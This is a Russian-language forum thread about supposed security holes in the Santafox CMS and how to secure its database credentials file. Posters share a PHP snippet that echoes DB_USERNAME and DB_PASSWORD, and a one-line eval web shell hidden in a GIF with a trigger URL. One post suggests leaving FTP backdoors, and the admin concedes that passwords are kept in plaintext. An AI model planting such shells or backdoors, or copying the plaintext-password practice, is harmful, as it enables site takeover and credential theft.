Автор Тема: Защищаем свой труд от недобросовестного заказчика!  (Прочитано 37209 раз)

0 Пользователей и 1 Гость просматривают эту тему.

milanLR

  • Гость
это ты про тот сайт, где конкурсы проводят "кто дешевле сделает?"

equilibrium07

  • Гость
Благодоря этому топику нашел уязвимость в санте)))
инишник с доступом к базе  лежит в корне и доступ к нему свободен с любого хоста.
А так как пароль админа в базе без енкода то получить его может любой злоумышленник.
Нужен СРОЧНЫЙ хотфикс.

Оффлайн bubek

  • Старый лис
  • *****
  • Сообщений: 615
  • Авторитет: 55
  • Пол: Мужской
    • Просмотр профиля
Какой пароль админа сдесь http://www.santafox.ru ?   ;D

equilibrium07

  • Гость
что то вроде
<?php
if (!include("http://".$_SERVER['SERVER_NAME']."/ini.php"))
{
    die (
'пусто');
}
include (
"http://".$_SERVER['SERVER_NAME']."/ini.php");
echo 
DB_USERNAME.''.DB_PASSWORD;
?>
в любом вложении по идее.
но я не уверен, так как не програмист. Скорее всего еще проще можно

Оффлайн arteshuk

  • Разработчики
  • Ветеран
  • *****
  • Сообщений: 1 214
  • Авторитет: 130
  • Пол: Мужской
    • Просмотр профиля
но я не уверен, так как не програмМист. Скорее всего еще проще можно

бред то какой ))) жесть просто )))

скажите, а КТО создаст такой файл (с приведенным Вами кодом) на сервере?

equilibrium07

  • Гость
зальет вложением.
у меня был инцидент с хостером, после которого в index.php на двух, разных кмс (неткат 4.1 и джумла 1.5) появлялся код. Так что стоит хоть как-то защитить от такого ини.

Оффлайн arteshuk

  • Разработчики
  • Ветеран
  • *****
  • Сообщений: 1 214
  • Авторитет: 130
  • Пол: Мужской
    • Просмотр профиля
зальет вложением.
у меня был инцидент с хостером, после которого в index.php на двух, разных кмс (неткат 4.1 и джумла 1.5) появлялся код. Так что стоит хоть как-то защитить от такого ини.

перестаньте чушь пороть, хорошо?

если взломщик может "залить вложением", значит он делает это через админку, а если через админку, значит доступы ему уже известны, значит пароли от БД он добыл другим способом и смысла в Вашем файле НОЛЬ.

Если же он имеет возможность залить без админки, значит аккаунт хостинга давно взломан и ВСЕ сайты на нем.

и инцидент был не у хостера а у Вас, взломан один сайт, значит взломаны ВСЕ сайты на аккаунте, будь их 2, 10 или 100.


equilibrium07

  • Гость
Цитировать
если взломщик может "залить вложением", значит он делает это через админку, а если через админку, значит доступы ему уже известны, значит пароли от БД он добыл другим способом и смысла в Вашем файле НОЛЬ.
эм... кстати а у этого форума оброботка пхп во вложении проходит?
зы, для того чтобы include и include_once присоединяли пхп файл надо просто запускать их от одного пользователя, и мне так кажется что форум санты и сайт санты под одним юзером.  ;D

Оффлайн Oslix

  • Администратор
  • Ветеран
  • *****
  • Сообщений: 2 473
  • Авторитет: 346
  • Пол: Мужской
    • Просмотр профиля
Форум санты и сайт санты, конечно под разными юзерами :)
В общем и целом, конечно, еквилибриум прав. Хорошо бы чтобы было все немного более паранойней :)
Но, тут надо соблюсти баланс между удобством и безопасностью.
Например с точки зрения безопасности хорошо бы пароли в засоленном виде хранить в БД. У нас они валяются открытым текстом.
Но с точки зрения удобства, у меня за 10 лет разработки сайтов было тааакое количество запросов от клиента уровня "вы нам делали сайт, его админил какой-то мальчик, он уволился и мы не знаем как зайти внутрь", что удобтво тут перевесило.

К тому же, если уж взлощику удалось залить шелл, то в 90% битва проиграна. С точки зрения получения доступа к БД и вытекающих оттуда последствий.
Так что передовая линия обороны должа все-таки лежать на настройке хостинга, на запрете FTP, ограничениях по IP и т.п. штукам. И уже во-вторую очередь в том в каком виде хранятся пароли

Оффлайн W.D.M.Group

  • Местный лис
  • ***
  • Сообщений: 131
  • Авторитет: 15
  • Пол: Мужской
  • Butterfly.CMS [http://butterflycms.com]
    • Просмотр профиля
equilibrium07 прав. есть такой нюанс. некоторые хостеры, с кривыми руками, могут не до-настоить чё-то и даже обычные графические файлы превращаются в монстра... дописать в конец жифки что-то типа <?php eval($_GET['code']) ?> ума особого не надо... загружаем на Ваш сайт, если есть возможность такая, а потом запрашиваем http://site.ru/content/.../0001.gif?code=fopen(\' бла-бла-бла...

технически - это уязвимость :'(

molny

  • Гость
Ну, собственно, мало что нового. Вообще, лучше оставлять ftp бэкдоры, чтобы можно было выгрузить всю структуру сайта и потом на удаленном сервере абсолютно все вычистить

UZmosk

  • Гость
Благодоря этому топику нашел уязвимость в санте)))
инишник с доступом к базе  лежит в корне и доступ к нему свободен с любого хоста.

Оффлайн Dmitry123

  • Старый лис
  • *****
  • Сообщений: 509
  • Авторитет: 31
  • Пол: Мужской
    • Просмотр профиля
А как это свободен, подробнее можно?

Оффлайн Rinat

  • Старый лис
  • *****
  • Сообщений: 602
  • Авторитет: 36
    • Просмотр профиля
Он наверное имеет ввиду ini.php.



Это не уязвимость, файл же не выводит результаты конфигурации,  если я конечно правильно его понял.

Максимум что там есть - это раскрытие путей после установки системы.
Файл sinstall/_install.log
« Последнее редактирование: 04 декабря 2014, 02:28:39 от Rinat »

Оффлайн bubek

  • Старый лис
  • *****
  • Сообщений: 615
  • Авторитет: 55
  • Пол: Мужской
    • Просмотр профиля
Папку sinstall после инсталяции нужно удалять